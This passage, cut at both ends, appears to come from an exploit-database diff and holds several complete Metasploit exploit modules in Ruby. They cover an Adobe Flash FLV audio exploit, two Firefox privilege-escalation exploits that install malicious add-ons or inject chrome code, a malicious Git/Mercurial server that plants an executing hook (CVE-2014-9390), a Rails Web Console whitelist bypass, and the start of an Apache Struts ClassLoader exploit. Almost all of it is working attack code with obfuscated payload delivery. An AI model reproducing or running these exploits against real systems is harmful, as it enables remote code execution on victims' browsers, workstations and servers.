encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
has been tested successfully on:
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.
Note that this exploit is effective against both CVE-2015-3113 and the
earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
to the same root cause as CVE-2015-3043.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3043'],
['CVE', '2015-3113'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],
['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],
['URL', 'http://bobao.360.cn/learning/detail/357.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')
return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 23 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
@flv = create_flv
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
if request.uri =~ /\.flv$/
print_status('Sending FLV...')
send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
def create_flv
header = ''
header << 'FLV' # signature
header << [1].pack('C') # version
header << [4].pack('C') # Flags: TypeFlagsAudio
header << [9].pack('N') # DataOffset
data = ''
data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0
data << "\xee" * 0x440 # SoundData
tag1 = ''
tag1 << [8].pack('C') # TagType (audio)
tag1 << "\x00\x04\x41" # DataSize
tag1 << "\x00\x00\x1a" # TimeStamp
tag1 << [0].pack('C') # TimeStampExtended
tag1 << "\x00\x00\x00" # StreamID, always 0
tag1 << data
body = ''
body << [0].pack('N') # PreviousTagSize
body << tag1
body << [0xeeeeeeee].pack('N') # PreviousTagSize
flv = ''
flv << header
flv << body
flv
end
end

138
platforms/multiple/local/41682.rb Executable file
View file

@ -0,0 +1,138 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::Remote::FirefoxAddonGenerator
autopwn_info({
:ua_name => HttpClients::FF,
:ua_minver => "5.0",
:ua_maxver => "15.0.1",
:javascript => true,
:rank => NormalRanking
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution',
'Description' => %q{
On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given
invalid input, would throw an exception that did not have an __exposedProps__
property set. By re-setting this property on the exception object's prototype,
the chrome-based defineProperty method is made available.
With the defineProperty method, functions belonging to window and document can be
overriden with a function that gets called from chrome-privileged context. From here,
another vulnerability in the crypto.generateCRMFRequest function is used to "peek"
into the context's private scope. Since the window does not have a chrome:// URL,
the insecure parts of Components.classes are not available, so instead the AddonManager
API is invoked to silently install a malicious plugin.
},
'License' => MSF_LICENSE,
'Author' => [
'Mariusz Mlynski', # discovered CVE-2012-3993
'moz_bug_r_a4', # discovered CVE-2013-1710
'joev' # metasploit module
],
'DisclosureDate' => "Aug 6 2013",
'References' => [
['CVE', '2012-3993'], # used to install function that gets called from chrome:// (ff<15)
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'],
['CVE', '2013-1710'], # used to peek into privileged caller's closure (ff<23)
],
'BrowserRequirements' => {
:source => 'script',
:ua_name => HttpClients::FF,
:ua_ver => lambda { |ver| ver.to_i.between?(5, 15) }
}
))
register_options([
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
], self.class)
end
def on_request_exploit(cli, request, target_info)
if request.uri.match(/\.xpi$/i)
print_status("Sending the malicious addon")
send_response(cli, generate_addon_xpi(cli).pack, { 'Content-Type' => 'application/x-xpinstall' })
else
print_status("Sending HTML")
res = generate_html(target_info,request.headers['Host'])
vprint_status res.to_s
send_response_html(cli, res)
end
end
def generate_html(target_info,refer)
injection = if target_info[:ua_ver].to_i == 15
"Function.prototype.call.call(p.__defineGetter__,obj,key,runme);"
else
"p2.constructor.defineProperty(obj,key,{get:runme});"
end
if refer.nil? or refer.blank?
redirect = "#{get_module_uri}/addon.xpi"
else
proto = ((datastore['SSL']) ? 'https' : 'http')
redirect = "#{proto}://#{refer}#{get_module_resource}addon.xpi"
end
script = js_obfuscate %Q|
try{InstallTrigger.install(0)}catch(e){p=e;};
var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
p2.__exposedProps__={
constructor:'rw',
prototype:'rw',
defineProperty:'rw',
__exposedProps__:'rw'
};
var s = document.querySelector('#payload').innerHTML;
var q = false;
var register = function(obj,key) {
var runme = function(){
if (q) return;
q = true;
window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
};
try {
#{injection}
} catch (e) {}
};
for (var i in window) register(window, i);
for (var i in document) register(document, i);
|
js_payload = js_obfuscate %Q|
if (!window.done) {
window.AddonManager.getInstallForURL(
'#{redirect}',
function(install) { install.install() },
'application/x-xpinstall'
);
window.done = true;
}
|
%Q|
<html>
<body>
#{datastore['CONTENT']}
<div id='payload' style='display:none'>
#{js_payload}
</div>
<script>
#{script}
</script>
</body>
</html>
|
end
end

179
platforms/multiple/local/41683.rb Executable file
View file

@ -0,0 +1,179 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE
# include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
# autopwn_info({
# :ua_name => HttpClients::FF,
# :ua_minver => "17.0",
# :ua_maxver => "17.0.1",
# :javascript => true,
# :rank => NormalRanking
# })
def initialize(info = {})
super(update_info(info,
'Name' => 'Firefox 17.0.1 Flash Privileged Code Injection',
'Description' => %q{
This exploit gains remote code execution on Firefox 17 and 17.0.1, provided
the user has installed Flash. No memory corruption is used.
First, a Flash object is cloned into the anonymous content of the SVG
"use" element in the <body> (CVE-2013-0758). From there, the Flash object
can navigate a child frame to a URL in the chrome:// scheme.
Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper
around the child frame's window reference and inject code into the chrome://
context. Once we have injection into the chrome execution context, we can write
the payload to disk, chmod it (if posix), and then execute.
Note: Flash is used here to trigger the exploit but any Firefox plugin
with script access should be able to trigger it.
},
'License' => MSF_LICENSE,
'Targets' => [
[
'Universal (Javascript XPCOM Shell)', {
'Platform' => 'firefox',
'Arch' => ARCH_FIREFOX
}
],
[
'Native Payload', {
'Platform' => %w{ java linux osx solaris win },
'Arch' => ARCH_ALL
}
]
],
'DefaultTarget' => 0,
'Author' =>
[
'Marius Mlynski', # discovery & bug report
'joev', # metasploit module
'sinn3r' # metasploit fu
],
'References' =>
[
['CVE', '2013-0758'], # navigate a frame to a chrome:// URL
['CVE', '2013-0757'], # bypass Chrome Object Wrapper to talk to chrome://
['OSVDB', '89019'], # maps to CVE 2013-0757
['OSVDB', '89020'], # maps to CVE 2013-0758
['URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-15.html'],
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=813906']
],
'DisclosureDate' => 'Jan 08 2013',
'BrowserRequirements' => {
:source => 'script',
:ua_name => HttpClients::FF,
:ua_ver => /17\..*/,
:flash => /[\d.]+/
}
))
register_options(
[
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] ),
OptBool.new('DEBUG_JS', [false, "Display some alert()'s for debugging the payload.", false])
], Auxiliary::Timed)
end
def on_request_exploit(cli, request, info)
if request.uri =~ /\.swf$/
# send Flash .swf for navigating the frame to chrome://
print_status("Sending .swf trigger.")
send_response(cli, flash_trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
else
# send initial HTML page
print_status("Target selected: #{target.name}")
print_status("Sending #{self.name}")
send_response_html(cli, generate_html(cli, target))
end
end
# @return [String] the contents of the .swf file used to trigger the exploit
def flash_trigger
swf_path = File.join(Msf::Config.data_directory, "exploits", "cve-2013-0758.swf")
@flash_trigger ||= File.read(swf_path)
end
# @return [String] containing javascript that will alert a debug string
# if the DEBUG is set to true
def js_debug(str, quote="'")
if datastore['DEBUG_JS'] then "alert(#{quote}#{str}#{quote})" else '' end
end
# @return [String] HTML that is sent in the first response to the client
def generate_html(cli, target)
vars = {
:symbol_id => 'a',
:random_domain => 'safe',
:payload => run_payload, # defined in FirefoxPrivilegeEscalation mixin
:payload_var => 'c',
:payload_key => 'k',
:payload_obj_var => 'payload_obj',
:interval_var => 'itvl',
:access_string => 'access',
:frame_ref => 'frames[0]',
:frame_name => 'n',
:loader_path => "#{get_module_uri}.swf",
:content => self.datastore['CONTENT'] || ''
}
script = js_obfuscate %Q|
var #{vars[:payload_obj_var]} = #{JSON.unparse({vars[:payload_key] => vars[:payload]})};
var #{vars[:payload_var]} = #{vars[:payload_obj_var]}['#{vars[:payload_key]}'];
function $() {
document.querySelector('base').href = "http://www.#{vars[:random_domain]}.com/";
}
function _() {
return '#{vars[:frame_name]}';
}
var #{vars[:interval_var]} = setInterval(function(){
try{ #{vars[:frame_ref]}['#{vars[:access_string]}'] }
catch(e){
clearInterval(#{vars[:interval_var]});
var p = Object.getPrototypeOf(#{vars[:frame_ref]});
var o = {__exposedProps__: {setTimeout: "rw", call: "rw"}};
Object.prototype.__lookupSetter__("__proto__").call(p, o);
p.setTimeout.call(#{vars[:frame_ref]}, #{vars[:payload_var]}, 1);
}
}, 100);
document.querySelector('object').data = "#{vars[:loader_path]}";
document.querySelector('use').setAttributeNS(
"http://www.w3.org/1999/xlink", "href", location.href + "##{vars[:symbol_id]}"
);
|
%Q|
<!doctype html>
<html>
<head>
<base href="chrome://browser/content/">
</head>
<body>
<svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
<symbol id="#{vars[:symbol_id]}">
<foreignObject>
<object></object>
</foreignObject>
</symbol>
<use />
</svg>
<script>
#{script}
</script>
<iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"
name="#{vars[:frame_name]}"></iframe>
#{vars[:content]}
</body>
</html>
|
end
end

374
platforms/multiple/remote/41684.rb Executable file
View file

@ -0,0 +1,374 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(
info,
'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390',
'Description' => %q(
This module exploits CVE-2014-9390, which affects Git (versions less
than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions
less than 3.2.3) and describes three vulnerabilities.
On operating systems which have case-insensitive file systems, like
Windows and OS X, Git clients can be convinced to retrieve and
overwrite sensitive configuration files in the .git
directory which can allow arbitrary code execution if a vulnerable
client can be convinced to perform certain actions (for example,
a checkout) against a malicious Git repository.
A second vulnerability with similar characteristics also exists in both
Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where
certain Unicode codepoints are ignorable.
The third vulnerability with similar characteristics only affects
Mercurial clients on Windows, where Windows "short names"
(MS-DOS-compatible 8.3 format) are supported.
Today this module only truly supports the first vulnerability (Git
clients on case-insensitive file systems) but has the functionality to
support the remaining two with a little work.
),
'License' => MSF_LICENSE,
'Author' => [
'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module
],
'References' =>
[
['CVE', '2014-9390'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],
['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],
['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'],
['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],
['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],
['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'],
['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],
['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a']
],
'DisclosureDate' => 'Dec 18 2014',
'Targets' =>
[
[
'Automatic',
{
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp perl'
}
}
}
],
[
'Windows Powershell',
{
'Platform' => [ 'windows' ],
'Arch' => [ARCH_X86, ARCH_X64]
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('GIT', [true, 'Exploit Git clients', true])
]
)
register_advanced_options(
[
OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']),
OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),
OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']),
OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false])
]
)
end
def setup
# the exploit requires that we act enough like a real Mercurial HTTP instance,
# so we keep a mapping of all of the files and the corresponding data we'll
# send back along with a trigger file that signifies that the git/mercurial
# client has fetched the malicious content.
@repo_data = {
git: { files: {}, trigger: nil },
mercurial: { files: {}, trigger: nil }
}
unless datastore['GIT'] || datastore['MERCURIAL']
fail_with(Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')
end
setup_git
setup_mercurial
super
end
def setup_git
return unless datastore['GIT']
# URI must start with a /
unless git_uri && git_uri =~ /^\//
fail_with(Failure::BadConfig, 'GIT_URI must start with a /')
end
# sanity check the malicious hook:
if datastore['GIT_HOOK'].blank?
fail_with(Failure::BadConfig, 'GIT_HOOK must not be blank')
end
# In .git/hooks/ directory, specially named files are shell scripts that
# are executed when particular events occur. For example, if
# .git/hooks/post-checkout was an executable shell script, a git client
# would execute that file every time anything is checked out. There are
# various other files that can be used to achieve similar goals but related
# to committing, updating, etc.
#
# This vulnerability allows a specially crafted file to bypass Git's
# blacklist and overwrite the sensitive .git/hooks/ files which can allow
# arbitrary code execution if a vulnerable Git client can be convinced to
# interact with a malicious Git repository.
#
# This builds a fake git repository using the knowledge from:
#
# http://schacon.github.io/gitbook/7_how_git_stores_objects.html
# http://schacon.github.io/gitbook/7_browsing_git_objects.html
case target.name
when 'Automatic'
full_cmd = "#!/bin/sh\n#{payload.encoded}\n"
when 'Windows Powershell'
psh = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
remove_comspec: true,
encode_final_payload: true)
full_cmd = "#!/bin/sh\n#{psh}"
end
sha1, content = build_object('blob', full_cmd)
trigger = "/objects/#{get_path(sha1)}"
@repo_data[:git][:trigger] = trigger
@repo_data[:git][:files][trigger] = content
# build tree that points to the blob
sha1, content = build_object('tree', "100755 #{datastore['GIT_HOOK']}\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build a tree that points to the hooks directory in which the hook lives, called hooks
sha1, content = build_object('tree', "40000 hooks\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build a tree that points to the partially uppercased .git directory in
# which hooks live
variants = []
%w(g G). each do |g|
%w(i I).each do |i|
%w(t T).each do |t|
git = g + i + t
variants << git unless git.chars.none? { |c| c == c.upcase }
end
end
end
git_dir = '.' + variants.sample
sha1, content = build_object('tree', "40000 #{git_dir}\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build the supposed commit that dropped this file, which has a random user/company
email = Rex::Text.rand_mail_address
first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
full_name = "#{first.capitalize} #{last.capitalize}"
tstamp = Time.now.to_i
author_time = rand(tstamp)
commit_time = rand(author_time)
tz_off = rand(10)
commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
"committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
"\n" \
"Initial commit to open git repository for #{company}!\n"
if datastore['VERBOSE']
vprint_status("Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:")
commit.each_line { |l| vprint_status(l.strip) }
end
sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build HEAD
@repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
# lastly, build refs
@repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
end
def setup_mercurial
return unless datastore['MERCURIAL']
# URI must start with a /
unless mercurial_uri && mercurial_uri =~ /^\//
fail_with(Failure::BadConfig, 'MERCURIAL_URI must start with a /')
end
# sanity check the malicious hook
if datastore['MERCURIAL_HOOK'].blank?
fail_with(Failure::BadConfig, 'MERCURIAL_HOOK must not be blank')
end
# we fake the Mercurial HTTP protocol such that we are compliant as possible but
# also as simple as possible so that we don't have to support all of the protocol
# complexities. Taken from:
# http://mercurial.selenic.com/wiki/HttpCommandProtocol
# http://selenic.com/hg/file/tip/mercurial/wireproto.py
@repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN'
fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814'
@repo_data[:mercurial][:files]['?cmd=heads'] = "#{fake_sha1}\n"
# TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat
@repo_data[:mercurial][:files]["?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo")
# TODO: finish building the fake repository
end
# Build's a Git object
def build_object(type, content)
# taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
header = "#{type} #{content.size}\0"
store = header + content
[Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
end
# Returns the Git object path name that a file with the provided SHA1 will reside in
def get_path(sha1)
sha1[0...2] + '/' + sha1[2..40]
end
def exploit
super
end
def primer
# add the git and mercurial URIs as necessary
if datastore['GIT']
hardcoded_uripath(git_uri)
print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}")
end
if datastore['MERCURIAL']
hardcoded_uripath(mercurial_uri)
print_status("Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}")
end
end
# handles routing any request to the mock git, mercurial or simple HTML as necessary
def on_request_uri(cli, req)
# if the URI is one of our repositories and the user-agent is that of git/mercurial
# send back the appropriate data, otherwise just show the HTML version
if (user_agent = req.headers['User-Agent'])
if datastore['GIT'] && user_agent =~ /^git\// && req.uri.start_with?(git_uri)
do_git(cli, req)
return
elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri)
do_mercurial(cli, req)
return
end
end
do_html(cli, req)
end
# simulates a Git HTTP server
def do_git(cli, req)
# determine if the requested file is something we know how to serve from our
# fake repository and send it if so
req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')
if @repo_data[:git][:files].key?(req_file)
vprint_status("Sending Git #{req_file}")
send_response(cli, @repo_data[:git][:files][req_file])
if req_file == @repo_data[:git][:trigger]
vprint_status("Trigger!")
# Do we need this? If so, how can I update the payload which is in a file which
# has already been built?
# regenerate_payload
handler(cli)
end
else
vprint_status("Git #{req_file} doesn't exist")
send_not_found(cli)
end
end
# simulates an HTTP server with simple HTML content that lists the fake
# repositories available for cloning
def do_html(cli, _req)
resp = create_response
resp.body = <<HTML
<html>
<head><title>Public Repositories</title></head>
<body>
<p>Here are our public repositories:</p>
<ul>
HTML
if datastore['GIT']
this_git_uri = URI.parse(get_uri).merge(git_uri)
resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>"
else
resp.body << "<li><a>Git</a> (currently offline)</li>"
end
if datastore['MERCURIAL']
this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)
resp.body << "<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>"
else
resp.body << "<li><a>Mercurial</a> (currently offline)</li>"
end
resp.body << <<HTML
</ul>
</body>
</html>
HTML
cli.send_response(resp)
end
# simulates a Mercurial HTTP server
def do_mercurial(cli, req)
# determine if the requested file is something we know how to serve from our
# fake repository and send it if so
uri = URI.parse(req.uri)
req_path = uri.path
req_path += "?#{uri.query}" if uri.query
req_path.gsub!(/^#{mercurial_uri}/, '')
if @repo_data[:mercurial][:files].key?(req_path)
vprint_status("Sending Mercurial #{req_path}")
send_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1')
if req_path == @repo_data[:mercurial][:trigger]
vprint_status("Trigger!")
# Do we need this? If so, how can I update the payload which is in a file which
# has already been built?
# regenerate_payload
handler(cli)
end
else
vprint_status("Mercurial #{req_path} doesn't exist")
send_not_found(cli)
end
end
# Returns the value of GIT_URI if not blank, otherwise returns a random .git URI
def git_uri
return @git_uri if @git_uri
if datastore['GIT_URI'].blank?
@git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'
else
@git_uri = datastore['GIT_URI']
end
end
# Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI
def mercurial_uri
return @mercurial_uri if @mercurial_uri
if datastore['MERCURIAL_URI'].blank?
@mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase
else
@mercurial_uri = datastore['MERCURIAL_URI']
end
end
end

107
platforms/multiple/remote/41689.rb Executable file
View file

@ -0,0 +1,107 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution',
'Description' => %q{
This module exploits an IP whitelist bypass vulnerability in the developer
web console included with Ruby on Rails 4.0.x and 4.1.x. This module will also
achieve code execution on Rails 4.2.x if the attack is launched from a
whitelisted IP range.
},
'Author' => [
'joernchen <joernchen[at]phenoelit.de>', # Discovery & disclosure
'Ben Murphy <benmmurphy@gmail.com>', # Discovery & disclosure
'hdm' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2015-3224' ],
[ 'URL', 'http://openwall.com/lists/oss-security/2015/06/16/18' ],
[ 'URL', 'https://groups.google.com/forum/message/raw?msg=rubyonrails-security/lzmz9_ijUFw/HBMPi4zp5NAJ' ],
[ 'URL', 'https://hackerone.com/reports/44513' ]
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' => [ ['Automatic', {} ] ],
'DefaultOptions' => { 'PrependFork' => true },
'DisclosureDate' => 'Jun 16 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(3000),
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', '/missing404' ])
], self.class)
end
#
# Identify the web console path and session ID, then inject code with it
#
def exploit
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'headers' => {
'X-Forwarded-For' => '0000::1'
}
}, 25)
unless res
print_error("Error: No response requesting #{datastore['TARGETURI']}")
return
end
web_console_path = nil
# Support vulnerable Web Console versions
if res.body.to_s =~ /data-remote-path='([^']+)'/
web_console_path = "/" + $1
end
# Support newer Web Console versions
if web_console_path.nil? && res.body.to_s =~ /data-mount-point='([^']+)'/
web_console_mount = $1
unless res.body.to_s =~ /data-session-id='([^']+)'/
print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
return
end
web_console_path = normalize_uri(web_console_mount, 'repl_sessions', $1)
end
unless web_console_path
if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump')
print_error('Error: The web console is patched, disabled, or you are not in the whitelisted scope')
else
print_error("Error: No web console path found when requesting #{datastore['TARGETURI']}")
end
return
end
print_status("Sending payload to #{web_console_path}")
res = send_request_cgi({
'uri' => web_console_path,
'method' => 'PUT',
'headers' => {
'X-Forwarded-For' => '0000::1',
'Accept' => 'application/vnd.web-console.v2',
'X-Requested-With' => 'XMLHttpRequest'
},
'vars_post' => {
'input' => payload.encoded
}
}, 25)
end
end

305
platforms/multiple/remote/41690.rb Executable file
View file

@ -0,0 +1,305 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking # It's going to manipulate the Class Loader
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::SMB::Server::Share
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts ClassLoader Manipulation Remote Code Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Apache Struts versions
1.x (<= 1.3.10) and 2.x (< 2.3.16.2). In Struts 1.x the problem is related with
the ActionForm bean population mechanism while in case of Struts 2.x the vulnerability is due
to the ParametersInterceptor. Both allow access to 'class' parameter that is directly
mapped to getClass() method and allows ClassLoader manipulation. As a result, this can
allow remote attackers to execute arbitrary Java code via crafted parameters.
},
'Author' =>
[
'Mark Thomas', # Vulnerability Discovery
'Przemyslaw Celej', # Vulnerability Discovery
'Redsadic <julian.vilas[at]gmail.com>', # Metasploit Module
'Matthew Hall <hallm[at]sec-1.com>' # SMB target
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-0094'],
['CVE', '2014-0112'],
['CVE', '2014-0114'],
['URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'],
['URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'],
['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204'],
['URL', 'https://github.com/rgielen/struts1filter/tree/develop']
],
'Platform' => %w{ linux win },
'Payload' =>
{
'Space' => 5000,
'DisableNops' => true
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
['Java',
{
'Arch' => ARCH_JAVA,
'Platform' => %w{ linux win }
},
],
['Linux',
{
